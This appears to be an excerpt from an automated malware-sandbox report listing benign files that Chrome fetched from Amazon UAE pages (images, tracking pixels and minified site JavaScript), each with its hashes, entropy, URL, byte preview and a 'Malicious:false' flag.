                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 186x116, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):2862
                                                                                                                                                                                                                                                                Entropy (8bit):7.799516625655038
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:48:TT0r6/jkNDhZCF6JY/4iOhUvbsbvQKT4T+RQJBP31gWNEhuUkTLF9xPXIWwTrA2:T3YN+Fj/47h6bs0ZDJzEhuDl9JIP
                                                                                                                                                                                                                                                                MD5:5EC611E125AD65F19846E814C06E7C15
                                                                                                                                                                                                                                                                SHA1:E7F6AB44B4B659D002AE91125053BAADE51553A7
                                                                                                                                                                                                                                                                SHA-256:91067E8704DC9AD4E56568610B3B4BA213A7BF640D043C8BA1C03981AB45A09A
                                                                                                                                                                                                                                                                SHA-512:196901B52ACE372F3EB0A91237B3340C2EC96CEBE3B414AB302429AF4077A5A20849346603E3AC3C355E5BE505FDED85EF7679CA57B574872516E75F49C785AB
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://images-eu.ssl-images-amazon.com/images/G/39/UAE-hq/2024/img/Apparel/XCM_CUTTLE_1717076_3763818_372x232_2X_en_AE._SY116_CB558609315_.jpg
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......t...."..............................................................!..1A."Q.2q....#a..%BR.3Ccr.................................................!...1"Qq.............?..8..<dD@DD.D@DD.D@DD.D@DD.D@DD.D@DD.D@DD.D@J.....O@?S.1.#.....Z...i.xj..;.t._...|....\.g..}......i..V..*EG..T.=y.3.9......=r.M!*.g .J.x.p..).1.......F.{W.i..+.w...@`.ve ..'./....k]..0%...}s....n..~*....K../.5q..W.;..6lc.....?+K....mj..[..R...$....@rd....]....?..q..#.6..i.U.....z..i.?.Rgf|.=>.."%3""." ""." ""." "`.E..M.+.Z.Z.<.R)....w.....olw..4iPN..>........2..............C=tnE.!.....XT.A..j-O.5mN...w..i.~*.A..w...|.......N.}uMb.Y..W... ....U..8..iF...fZ.....w<...:.r.g.\..y3C...)e(..(@.M.....M.._..8.......u...&)B..UZ4...N.4B...UAc..oK.g..aR..Szzm......|.)z`+S.N.I..`...t}W.......^.v.......=D.(....wV.8.........8..i....V.sP.]...."...
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (548)
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):15219
                                                                                                                                                                                                                                                                Entropy (8bit):5.408378924173576
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:384:LA+1NXTmdAVVxLxwEsgiGrdjLKYVu10V4:cGQg9dri
                                                                                                                                                                                                                                                                MD5:10A0F40E0F5C16A5157FF98B7335A887
                                                                                                                                                                                                                                                                SHA1:88627C59520E02536E13761347C845365085186B
                                                                                                                                                                                                                                                                SHA-256:4AFD614399E1B0CDB38015CFDFCC778764F61E8B6B1BB5C73D67829BAB1457C5
                                                                                                                                                                                                                                                                SHA-512:4C472B6BE18186AA86A7798B7A543DFA0494BA51267203A7CC77B490E00EF0BA8F25176B8EB7BADBB3F5329509D2F3E4124ACF542E60110204B5E38F23C49106
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:(function(n){var p=window.AmazonUIPageJS||window.P,m=p._namespace||p.attributeErrors,l=m?m("AmazonLightsaberPageAssets",""):p;l.guardFatal?l.guardFatal(n)(l,window):l.execute(function(){n(l,window)})})(function(n,p,m){(function(){var l;(function(c){c.deep=function(a){return JSON.parse(JSON.stringify(a))}})(l||(l={}));var x;(function(c){c.log=function(a){for(var b=1;b<arguments.length;b++);}})(x||(x={}));var q;(function(c){c.isObject=function(a){return!!a&&"object"===typeof a&&!Array.isArray(a)};c.isNonEmptyString=.function(a){return"string"===typeof a&&0<a.length};c.isPositiveInteger=function(a){return"number"===typeof a&&Math.floor(a)===a&&0<=a&&Infinity!==a};c.isFunction=function(a){return"function"===typeof a}})(q||(q={}));var B=this&&this.__awaiter||function(c,a,b,f){function d(a){return a instanceof b?a:new b(function(b){b(a)})}return new (b||(b=Promise))(function(b,g){function e(a){try{r(f.next(a))}catch(t){g(t)}}function h(a){try{r(f["throw"](a))}catch(t){g(t)}}function r(a){a.d
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 450x320, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):15486
                                                                                                                                                                                                                                                                Entropy (8bit):7.9302938944747
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:384:TZKJq33E6g6+t4vx8q7paMcCgyQU2nZUN2T3RT5:gJe3E6b+ts8CcMxr30jTh9
                                                                                                                                                                                                                                                                MD5:C384CD2216B7C95A5B178DE3D6914DBC
                                                                                                                                                                                                                                                                SHA1:4D1881AC80EB0F109F69C8DCC044A8874BE7DEBC
                                                                                                                                                                                                                                                                SHA-256:E315BA6875C386394382B1B31BABD6A1F396C49071826268E5330007F9DAB577
                                                                                                                                                                                                                                                                SHA-512:A25A9B934F6ABDD8E6DFC375049F37B9C3D82585384E03E91F089FD2CE638BC317D069064038800F7B0336060E582A42E4C8F8E0C43CC29942662C0B1862FCDD
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......@...."..........5........................................................................h.s..T.JC.z...%.......u..s.g....V*|.=MG.............(^o.(...[...................=.U...].......c.C.}........o..._/..............,~.tc.............@c8.6..@+...o.id.....Xkl.$..}y....b...5.............1.U.....-.n..M.t...../Z..=................uc.?n=.u.|./gr......gbv.k.S..............m.1.??..k.;BG....D..j.t...Z.f/.V.P...o....<.:/...rJ:F..LnL..{.a{@..........c8...3...........d...lV8.y<.__..........C.{.aw@..........y...8.>}o.6.{.9.....m..}..._ygQ...8.[.P....k.Ry....Lx..d.O.....cy....wf".}.0............<{...<"....B....Un.u..C_..P.Ws.I..o......]y.......z..T%=G...E..Q7...D].}...f+.?#..R.r..[............?.....\.....]...+.C........Q..n.a......\........".b....:..!..&.|.=..W.?k.[....>u...r..0............<{.9.....nQ.o.......=I
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 186x116, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):2140
                                                                                                                                                                                                                                                                Entropy (8bit):7.681064331721705
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:48:/85m2MxBSNmKeGioYpVBZOQrk/04c0hYaKBb:/8BSsNleGxYHOQrF4c0uZ
                                                                                                                                                                                                                                                                MD5:40DFFE0C2A79542E7871C214C83B9389
                                                                                                                                                                                                                                                                SHA1:8B7180263F4ADEBD0229A7CA24F058804E014EF8
                                                                                                                                                                                                                                                                SHA-256:99FFE00914EC7C4911807777D032D34E7FCF0DB31E86BEDB7A90E7150CFE2D85
                                                                                                                                                                                                                                                                SHA-512:C8636B35DF266BDB5CAA6FDDC60A91F7D27623EB74305850394BA17965AF1DE632C4F9B7ACC4BF51B5980E6FE2000B92414BEBE68FC92BD5A968D7FAE38CBED7
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................."......".$...$.6*&&*6>424>LDDL_Z_||.............................."......".$...$.6*&&*6>424>LDDL_Z_||.......t...."..........5...................................................................................W.*...+B..X."e...l.......5...o|=.+....n...m.5........k.*....y~xKW..G..O.g.........d..j.Z.....-.z..?.2.l|.>.(....O.03.~`...r.eg..>...<.%.-.fU..M=..<}........fQ..{.A.8....N......t..o2......]t....<....<..............N...........................!t.."%12@Qq.$0A.......#456ars.......&37CPRSVcdu..........?...V...0.nrFi.y..9..l.w.#(...S."....2.aJ+1.....1.|M....j5y...Oua..8......5..1...S..BO.2.....m..j8..S.}..M-.%n.s..q.h.>9.U..Y..V..}.Z.2..(8..3.r.[3.J<..iv.[P..a.2C.h.~.77W.zXv....Y...Ur:3!..`..y....i7qE.R.:M..<..-<...q.hX.....9.P....Q..TP.t.-..Q`>,..J.......C.R...LT.*.......P=..Ll.g.Sj.(..vLa....^....]9...B.!m>.v7.......1>.5LZ_w+..]...&....?.s`........9.Q..b.NW`.....[{0...j...=cT^..=...Qc`s<........Q.k.u...+I..
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 186x116, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):3646
                                                                                                                                                                                                                                                                Entropy (8bit):7.851599474948609
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:96:Tof+vGceX5qNWyDaD9Y94BaMVvXF4ZDLwobQVEWkajUXrP:0f+vPGmWyDaDf1VkLRbQVnk4UT
                                                                                                                                                                                                                                                                MD5:9300223E26C7F980B8ACD167152C7839
                                                                                                                                                                                                                                                                SHA1:FFB0664BA2ADE8400AAEF716CB6C40BD97D66DA0
                                                                                                                                                                                                                                                                SHA-256:5229027DDCD520105EEF22EB06144D7D8214D930DEBF6ACD790C2B57D694AC79
                                                                                                                                                                                                                                                                SHA-512:ED66660A14F4CBA097AC09A71046D8B8B0412CD72E27C5B7674DFFB81E6CE6EFE69995A52043126B15BF8959A6922F992D8DEDBFEE2B3523195DCB0DCB07310B
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......t...."...............................................................!1A.."Q.aq.#2Br..R..3...$CSb.................................................!1..."2#Aaq...............?..U)J.JR.R....(.)J.JR.R..i..#...8...P..X^eT.9#.Fj?7...m.$......R.0kv.4j7...]...d.+.@)JP.R......)@)JP.R......)@)Q-?.-.].....m....<.d$.3.....fIP.su.I.. .$....\......d~R.....#.r.5.........8$....<T{..K..d3..L.I..G..e.....k..q...+4R..'.@>_%.O".....P....^....1].8.XXo.b..4.......v.&......Ft.{..!...<@v...V....~..*U.......[*... ....."h..N...........Y.^.Q...l.6.w.._...$.0.#..:....p.w..a......H...-.....G.('$..=..z......kHR.....(.)J.JR.R....j..X&h..U....{c..j....kPo.A&Nv.#`~....$.Zg./8.<.:H..>M..:..QU..:...Zo.........?......d,f..C.F.........D....D..j.pdU.....&.o.....ag.Ry. .p7.Fwg8.d...p..+.2......!.g.U{...........cT..............~?.......%.g
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):43
                                                                                                                                                                                                                                                                Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://fls-eu.amazon.ae/1/batch/1/OP/A2VIGQ35RCS4UG:262-5692979-3003613:6NXZ98JFWKRECR4538X7$uedata=s:%2Frd%2Fuedata%3Fat%26v%3D0.294992.0%26id%3D6NXZ98JFWKRECR4538X7%26m%3D1%26sc%3Dcsa%3AstartVL%26pc%3D27641%26at%3D27641%26t%3D1723469122090%26csmtags%3DstartVL%26pty%3Dzeitgeist%26spty%3Dbs%26pti%3Dundefined%26tid%3D6NXZ98JFWKRECR4538X7%26aftb%3D1%26lob%3D1:27641
                                                                                                                                                                                                                                                                Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 400x400, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):14622
                                                                                                                                                                                                                                                                Entropy (8bit):7.867458077991927
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:384:Lj0bACI6nRAvBhrvBQlD6AE3WJ32D8arKXoKyDuadeLYM:cbLIXBh9kQWJ2QoKuuiesM
                                                                                                                                                                                                                                                                MD5:C60A77B8880BF976B06488D12FEA13E3
                                                                                                                                                                                                                                                                SHA1:07E14DFA0BF56E0BCE2EEDAC999878F8DFD3528B
                                                                                                                                                                                                                                                                SHA-256:A2CD8FA5065A7F5AD75077D385983389DFE212E31D8393EF28D1D7673A3E6CC9
                                                                                                                                                                                                                                                                SHA-512:9CE72741205EB6553031DEFCD42F1BCABC9977C2EAEA99BC41A7928BFBBBE1293B9F4DE526571FFCED40EE12C36EAD22B270DD4448FB8D43C1DCA4314438717E
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......JFIF................................................................"!!!"&&&&&&&&&&........... ... &&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&......................4.........................................................................H....: + ...............O.....?l<.NdW.....<v.|w=..............R..w.Z.uK.>......U...I.t.l..<................GN2...W.]. ...0.N...;Y.w.7}|..........%..p...uo. ......."R................S...z.?^.z$.........u...D.5........,.y...............F..M...QP......9..... ..........6..uZ.y.......!...<..~=.................5.su.d.......eoj.................[....0.....yl... .............D...N.=f.....j...PH......Z..O.d........z.LY.t*...[............9r.k..{.l.$|}........u.a..=p..._3f2..@...."<.G+.3.h.=qIls......."N...O...!....c..R.....[1.w.=.?`!...w..s)...#.....`.(..c.7=<. .!.f..U......./.S.._.hi.H.,R.c^.....<C..A...qSB..$.g..X...=.x.JH.....B.G..`..~.A.`!I.s.....U..K.Gw.....Z...+.....z}.OZ..u .;M......Zz..v.P.....Zx.,y.;...).+.?.....;._.
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):43
                                                                                                                                                                                                                                                                Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 225x160, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):4738
                                                                                                                                                                                                                                                                Entropy (8bit):7.892765739035918
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:96:TkZqPMdkH6o+dGEMFgfnYtBQamGloYWPwGqaUAetC2AKDL56:kBd+5+UEcgfYtBfmhwGr6tPE
                                                                                                                                                                                                                                                                MD5:64021DEFF31B043D1C40813AF7284E59
                                                                                                                                                                                                                                                                SHA1:B237F1E4BF5CB22D53E178DF2F60B6FBD34CF8CA
                                                                                                                                                                                                                                                                SHA-256:667A3EEF7F0305D824E231BDC783C27354B92591EAC582E6C80CE25015F8E6E0
                                                                                                                                                                                                                                                                SHA-512:4B09CDB2CAC3D47085CCE3F869E56366C8A6239F3B624C4C16E09AF0EAC83E1EAABF778FCF7B9342C8E8D8E18E1C51D6AAEFE7F9B8DA50FDB6D600ABA157F254
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."...............................................................!1.Aa.."Qq..2BRbr...#3c.........$%4S...............................................1..!"A............?..D@DD.E.]....._...|D.x..c<.SCq./m..o....z.h.N....s&).1<nC%}T.....z0(.m..h...,..o.9..D#r.a*....J$... ...X...u....4..c<...[Z\..0,.#....l]./.... ..E...7...T`...5N...4O..7.<..W.0...G.\z.,.|N.!...H.c...S.}.EVd~.p...MVE%W.y.R..Zk*""." ""." ""." ""." ""." O!.9...ZM.......q.....I<.{...$...p.k.z...5p.3..1..r....+U.s.#.....].z....l.......3a.7[.j.(.6Y.JB.k.@w....K.h..R.j.4...(....;^.2..oYL6.......r...V......;........(&.....xe..1oW...W.L.i...>..K\.Ad...,.....c...X.+..)*..@........t!..D@DD.D@DD.D@DD.D@DD..=.`%.......1;..o.....w...,..c;..|}..9.?$L.y.A"t9_.............W..o.M.....VY/....b.(..x..g..rX..x)....._....0..f.x6PM.._.F..n....E."
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (310)
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):311
                                                                                                                                                                                                                                                                Entropy (8bit):5.0766029190285
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:6:Qs73kyM+BMLSBxLSBUts6J9YM5UNb5IpDyXF0H1U:Z73kCAUtb6eaIpUUU
                                                                                                                                                                                                                                                                MD5:B5806AB25B3512AFF67F321EB7DEF3DD
                                                                                                                                                                                                                                                                SHA1:220A02C8827B7D4D36ADA2DAB2899D006F18526E
                                                                                                                                                                                                                                                                SHA-256:03392AA5AAA881010DEA9FE4C8339D06376400F9B514A4C194600F0A7BA2B267
                                                                                                                                                                                                                                                                SHA-512:B27FE40D6FA7E9AE1E2D4F2E61BE0B45C3FAA99E35E0C4CCACD1FA415A7B012E44A625EA8852EBBDBD0AAD876782C099A7239A8A19D5A93D6CD155738A27E6FD
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://images-eu.ssl-images-amazon.com/images/I/01+MhCiVD-L.js?xcp
                                                                                                                                                                                                                                                                Preview:'use strict';mix_d("ZeitgeistStaticFrontEndCards__p13n-zg-banner-landing-page-footer:p13n-zg-banner-landing-page-footer__m-FIgFxR",["exports","tslib"],function(a,b){a._operationNames=[];a.card=function(){return b.__awaiter(void 0,void 0,void 0,function(){return b.__generator(this,function(c){return[2]})})}});.
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 213x200, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):11763
                                                                                                                                                                                                                                                                Entropy (8bit):7.959287963633669
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:06e1FZNciE5ReGKurDsmVMDSu26HVKJMIJkGwwQoDI3h6WpXlnmX1iQ53XQ7G46D:06e1F3ciEzbKQDsGMDFlKKBWQdoS1mFR
                                                                                                                                                                                                                                                                MD5:95396C959D6AF843C43CDB1FBCD54BA4
                                                                                                                                                                                                                                                                SHA1:EFE914C7F6B7C1346801513B1CD78888E3787E23
                                                                                                                                                                                                                                                                SHA-256:4AEBA303F563C3B74DAB8F69F5AA18B9E081525720F3D6333492162CECF5CE35
                                                                                                                                                                                                                                                                SHA-512:23533365C65BBCC52ECB531BAE5587440421BBF5EBF14C3058DC7F2115C0AE56F11146208CCB6E83E7E06BA3AA809B720238B4A1F24734A3922991EF93A82803
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."...............................................................!.1.A.."2Qaq.#...3BR....$br..cs......4ST....................................................!.1A.#2B.aq..............?..tQE.E.P.QE.E.;.....rx....t..u:B..R:.8..*.}.g..r.U....a..{.f_..o=..-..N.mv.k$....~hk+....d.#...V.....v.0......?....._i.".-....\.?.,...\.X.|..I.N......h5........KH..$...._._j~....x.'"..E.0.a7......K.....@,@.8.jf:f.W..d.m.J.U.......=zI...../s...d..l...M....*.......5H..S... ....hV:..Cw.......h.....U.m.P{B...f1.....Ej...89.w^..\...Q................J...^....4{r...x?....$.p%.H....p.p..%9}.1.....8..F......_..L..6.>3....~8L....z...l.6....A.....rB.a.#.R>..S.3...&.....G..=......|....../e...<..;.1.....jV..\.J.."..).._k..D..QE.E.P.QE.P>.....4]...^......`........!..N...^.X..@.Dx ..o.._.ph.>.....X;.'.g...j...y...w'#.i.Lc...
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 289x200, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):9636
                                                                                                                                                                                                                                                                Entropy (8bit):7.933638192088915
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:9oL5Auc5GZZQuzQiMer+v/FOPxTOFTt33NUZMAYL74:9oFA75Tu0GrmFWxallq1Yv4
                                                                                                                                                                                                                                                                MD5:58B531447554FBE79B17638EFCEA7679
                                                                                                                                                                                                                                                                SHA1:38175A8C1A291E85CA1FFB212D5260C4C28595BB
                                                                                                                                                                                                                                                                SHA-256:D8CA907E7E5C312946E43BB42A4FFB26679F68971AB16F102D54FD90A477D0D1
                                                                                                                                                                                                                                                                SHA-512:0A294388D5D87F252CBD9BC4B7FBF1A2065ADC031EB2068E8A2AA675DD7930B463FB09D77970BE96B3614C59A6FA8195B08B7B0A6005AD88E8A151BC8C9F2FC9
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://m.media-amazon.com/images/I/71tGQq+WtwL._AC_SY200_.jpg
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*........!.."..........2..............................................................._9.q.........f..M.#..4.%].O.ei..G...4....i..L#..0.d.";..H.i..:.G.....P.U...d...S|.y!.)IB1.Hw..XK.HN>....h.!q}-K.R......\.>..F.9..]X..X.Re..K.!4...`.%..|..,..raHt.R.&..I..R\".e..K0..._,(..JM....GuWlU........r#.a...V.Lj...E.E..p...p.Ph..U.U.[Y.}*....r..X+..U.Q.Ff..v..E.......s..<..p.wu8C..S......s.. ."9.c..*v..j."} ......=Uk.zvW?...[.=...G.n(^....p....;.<...r..p....1.d.Y.=...^....Z.F9.1.1...-.:}....0.*.D...cUpW....x.G...t...W.y..wN..d............f.}.=.^.5s\....c...Y,..A.,.>y./4..d.*/v.G.} .._......N.+...f.v.m.jg..*6.)r7o[>/....1G0....=.X-......<.D.<....9.,f..z_.}.=...pU..+ .M.B...K/.K=>.aH...|=C.k......n.V..@.. .....G........^.IX.c".G(...b.k............s.r....r .4|...?.9.O=..7.9WZ.Q2..fq....~%!.....i....h8b.V...<h
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (521), with no line terminators
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):521
                                                                                                                                                                                                                                                                Entropy (8bit):5.173468454820399
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:12:21+uZ/PqWI/cuT2HLpog8AlMJ5PIlcmm1PRh:21nZ/PCnTaL2LAWJ5NxRh
                                                                                                                                                                                                                                                                MD5:C043EEC9FC9735799701A0AEB64C1569
                                                                                                                                                                                                                                                                SHA1:A4A4FCA8C35CD12206BF915CBA1AA0075E436AB6
                                                                                                                                                                                                                                                                SHA-256:432DFF2BD6F663C6151A5947FA318A46463085D4F6E40761450E8B38FD0FE938
                                                                                                                                                                                                                                                                SHA-512:3C8A4CC2A71AF95B8CA4B6FEA967D70A717503654FDA01E0B5E170E9ACD59530F41C7D84F6DB626355347B9D95D5461A43E6CCE4284D2AE60970E80114BF2A1F
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://images-eu.ssl-images-amazon.com/images/I/01wGDSlxwdL.js?AUIClients/AuthenticationPortalInlineAssets
                                                                                                                                                                                                                                                                Preview:(function(a){var d=window.AmazonUIPageJS||window.P,e=d._namespace||d.attributeErrors,b=e?e("AuthenticationPortalInlineAssets",""):d;b.guardFatal?b.guardFatal(a)(b,window):b.execute(function(){a(b,window)})})(function(a,d,e){a.when("A","ready").register("cross-domain-sso",function(b){var c=b.state("central-identity-provider-state");if(c&&c.sloDomainsToPing&&Array.isArray(c.sloDomainsToPing))for(var c=c.sloDomainsToPing,a=0;a<c.length;a++)0<c[a].length&&b.post("https://"+c[a]+"/ap/sso/clear",{withCredentials:!0})})});
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:HTML document, ASCII text
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):71
                                                                                                                                                                                                                                                                Entropy (8bit):4.19644707821733
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:PouVIZxgRO5ZB1XbZ6iFi:haxUkZ3X96x
                                                                                                                                                                                                                                                                MD5:6AAEF67381946BFC1DDACCA8CF7F6C36
                                                                                                                                                                                                                                                                SHA1:E441BBA8B691AD0FFF0BCCB75974880018AB41D6
                                                                                                                                                                                                                                                                SHA-256:73F8AE8C11DAA6AD905107970E55C3C64CD7133561E9E91E650AAB092BA7245E
                                                                                                                                                                                                                                                                SHA-512:99039B90D4F3819EFB0A395D0DC810DEE1A56265D443D24D1C9BDF832EF9F95887E3C417253698A4F76EF176D0ACE6334905F4B7B4E6A8421D2F650B84255EC2
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://www.amazon.ae/rd/uedata?rid=M6RE43WFQNSF80R5MH23&sid=262-5692979-3003613&rx=M/Em/ehxskiaJWIT7Jxrmw
                                                                                                                                                                                                                                                                Preview:<!DOCTYPE html><html><head><title>x</title></head><body></body></html>.
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 450x320, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):11198
                                                                                                                                                                                                                                                                Entropy (8bit):7.908862409183397
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:LoTwD0PsbVDvC3lduS2NOGMBAVI/8PDeUjsWK1HBf:P0PmVoduSPGMC4VysRBf
                                                                                                                                                                                                                                                                MD5:41488CBD3E3645390633E2A7678F789B
                                                                                                                                                                                                                                                                SHA1:EA918B0BD30A79277F9FD232CD877033D2C54367
                                                                                                                                                                                                                                                                SHA-256:8ADEC3E8668AD053B35EFD7DB6FD47FDD809FB1414300A60CE347EBC68449630
                                                                                                                                                                                                                                                                SHA-512:ABDD9ECDFFB2241688FD3EDF3FA71BBC236162DF51FACC57DDFFC5D554573117E89604B0599F5F97A44BC3E894F2C2435659176681256C55DF8083F0B1963669
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:"https://images-eu.ssl-images-amazon.com/images/I/51zgrgugoJL._AC_UL450_SR450,320_.jpg"
